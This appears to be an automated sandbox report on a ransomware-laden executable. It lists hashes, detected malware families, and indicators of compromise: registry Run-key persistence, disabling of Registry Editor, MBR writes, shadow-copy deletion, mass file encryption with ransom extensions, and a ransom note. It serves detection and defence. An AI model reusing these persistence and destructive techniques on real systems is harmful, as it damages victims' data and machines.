Resubmissions
24-11-2024 00:19
241124-amn9zazrdk 1003-05-2024 16:55
240503-vffz8sec77 1015-04-2024 14:29
240415-rtx9wsgf63 1010-04-2024 15:57
240410-td2cqadc92 10Analysis
-
max time kernel
220s -
max time network
560s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-04-2024 15:57
Static task
static1
General
-
Target
Computer Raper.exe
-
Size
85.4MB
-
MD5
bdb24ed9f869fcd462b316148514fc5b
-
SHA1
83935122b626378a3149e9036cd751514add4b52
-
SHA256
83875ea85b183c609c5ddcd92afe62265745192a417b80524f12741fc028aca0
-
SHA512
12fdb77a75debeacbc4b98cac45d09a7bcc378bd9bd51bbc035838b99c1d595660d5c0961a2d041b2e8359f3b5b096f589d39453ada9874436411b94b8b0d611
-
SSDEEP
1572864:NUkskQ1oOZrCqix58TkbajhXBFEQT9VotzcJ97:N/NQbCbmXXEUvoM97
Malware Config
Extracted
C:\g1rFryAhrVg2xrt\DECRYPT_YOUR_FILES.HTML
Signatures
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Chimera 11 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
description flow ioc pid Process 1374 ip-addr.es Process not Found 2772 ip-addr.es Process not Found 2938 ip-addr.es Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe 132 netsh.exe 3 ip-addr.es Process not Found File created C:\Program Files\7-Zip\Lang\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe 1 bot.whatismyipaddress.com Process not Found 6 ip-addr.es Process not Found 1482 ip-addr.es Process not Found -
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
resource yara_rule behavioral1/memory/2440-57-0x0000000010000000-0x0000000010010000-memory.dmp chimera_loader_dll -
CryptoLocker
Ransomware family with multiple variants.
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Fantom
Ransomware which hides encryption process behind fake Windows Update screen.
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (382) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral1/files/0x0003000000025c90-4273.dat mimikatz -
Contacts a large (1111) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Disables RegEdit via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 20292 netsh.exe 132 netsh.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe DeriaLock.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3793b57.exe.9E4B7BEDA7F0D4620A7D6D10A15A29082081C9E33F7576EAA3732B569C9FBEAE InfinityCrypt.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe.9E4B7BEDA7F0D4620A7D6D10A15A29082081C9E33F7576EAA3732B569C9FBEAE InfinityCrypt.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3793b57.exe explorer.exe -
Executes dropped EXE 64 IoCs
pid Process 3688 AgentTesla.exe 2440 HawkEye.exe 4040 butterflyondesktop.exe 3080 $uckyLocker.exe 1456 7ev3n.exe 2728 butterflyondesktop.tmp 4272 Annabelle.exe 4616 BadRabbit.exe 2844 Birele.exe 1156 Cerber5.exe 4368 CoronaVirus.exe 4568 CryptoLocker.exe 3440 CryptoWall.exe 4800 CryptoLocker.exe 980 DeriaLock.exe 4932 Dharma.exe 3708 Fantom.exe 1556 GandCrab.exe 896 InfinityCrypt.exe 4968 Krotten.exe 480 NoMoreRansom.exe 20272 54A.tmp 7368 NotPetya.exe 9724 Petya.A.exe 10000 PolyRansom.exe 11380 PowerPoint.exe 11896 jOIoAokc.exe 12576 EMMAgEYw.exe 12584 system.exe 12740 RedBoot.exe 23372 RedEye.exe 37380 Rensenware.exe 12784 jOIoAokc.exe 12828 EMMAgEYw.exe 12904 PowerPoint.exe 15100 PolyRansom.exe 39236 nc123.exe 11116 Rokku.exe 28112 protect.exe 14300 Satana.exe 20216 PowerPoint.exe 20144 assembler.exe 5648 PowerPoint.exe 5908 PowerPoint.exe 5920 PowerPoint.exe 6124 Seftad.exe 6416 PowerPoint.exe 6492 PowerPoint.exe 6280 PowerPoint.exe 2840 PowerPoint.exe 1636 PowerPoint.exe 6672 PowerPoint.exe 6696 PolyRansom.exe 6944 D01.tmp 7056 PowerPoint.exe 4864 PowerPoint.exe 7084 PowerPoint.exe 7072 PowerPoint.exe 7060 PowerPoint.exe 7324 PowerPoint.exe 6300 SporaRansomware.exe 7620 WindowsUpdate.exe 7964 PowerPoint.exe 5240 PowerPoint.exe -
Loads dropped DLL 2 IoCs
pid Process 1424 rundll32.exe 39344 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 34736 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0002000000025c83-111.dat upx behavioral1/memory/2844-128-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/2844-151-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/2844-130-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/3708-282-0x0000000004B10000-0x0000000004B20000-memory.dmp upx behavioral1/memory/480-4834-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/files/0x000100000002a7f5-6058.dat upx behavioral1/files/0x000100000002a821-15097.dat upx behavioral1/files/0x000100000002a87a-20556.dat upx -
Adds Run key to start application 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" NoMoreRansom.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" ViraLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\CryptoLocker.exe" CryptoLocker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" jOIoAokc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EMMAgEYw.exe = "C:\\ProgramData\\sykUwIws\\EMMAgEYw.exe" PolyRansom.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EMMAgEYw.exe = "C:\\ProgramData\\sykUwIws\\EMMAgEYw.exe" EMMAgEYw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EMMAgEYw.exe = "C:\\ProgramData\\sykUwIws\\EMMAgEYw.exe" EMMAgEYw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" jOIoAokc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*3793b5 = "C:\\c3793b57\\c3793b57.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" jOIoAokc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" jOIoAokc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Roaming\\WannaCry.exe\" /r" WannaCry.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\c3793b5 = "C:\\c3793b57\\c3793b57.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" PolyRansom.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\c3793b57 = "C:\\Users\\Admin\\AppData\\Roaming\\c3793b57.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*3793b57 = "C:\\Users\\Admin\\AppData\\Roaming\\c3793b57.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\jOIoAokc.exe = "C:\\Users\\Admin\\CGgwAcgA\\jOIoAokc.exe" PolyRansom.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\OneDrive\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Searches\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\g: Cerber5.exe File opened (read-only) \??\i: Cerber5.exe File opened (read-only) \??\l: Cerber5.exe File opened (read-only) \??\n: Cerber5.exe File opened (read-only) \??\r: Cerber5.exe File opened (read-only) \??\x: Cerber5.exe File opened (read-only) \??\a: Cerber5.exe File opened (read-only) \??\m: Cerber5.exe File opened (read-only) \??\o: Cerber5.exe File opened (read-only) \??\s: Cerber5.exe File opened (read-only) \??\t: Cerber5.exe File opened (read-only) \??\u: Cerber5.exe File opened (read-only) \??\y: Cerber5.exe File opened (read-only) \??\j: Cerber5.exe File opened (read-only) \??\k: Cerber5.exe File opened (read-only) \??\q: Cerber5.exe File opened (read-only) \??\w: Cerber5.exe File opened (read-only) \??\e: Cerber5.exe File opened (read-only) \??\h: Cerber5.exe File opened (read-only) \??\p: Cerber5.exe File opened (read-only) \??\v: Cerber5.exe File opened (read-only) \??\z: Cerber5.exe File opened (read-only) \??\b: Cerber5.exe -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2772 ip-addr.es 2938 ip-addr.es 1 bot.whatismyipaddress.com 3 ip-addr.es 6 ip-addr.es 1374 ip-addr.es 1482 ip-addr.es -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." Krotten.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 64 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\CoronaVirus.exe CoronaVirus.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 14300 set thread context of 6920 14300 Satana.exe 220 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ExpenseReport.xltx CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hans\UIAutomationClient.resources.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-16.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ppd.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-ms.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GamingApp_2021.427.138.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\ProfileIcons\{61c54bbd-c2c6-5271-96e7-009a87ff44bf}.scale-100.png CoronaVirus.exe File created C:\Program Files\Java\jre-1.8\bin\policytool.exe.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC32.DLL.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OSFROAMINGPROXY.DLL.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-96_altform-lightunplated.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-36_altform-lightunplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ul-oob.xrm-ms.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\fr\ReachFramework.resources.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-ul-phn.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml CoronaVirus.exe File created C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_x64__8wekyb3d8bbwe\Assets\TipsAppList.targetsize-30_altform-lightunplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\download.svg.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 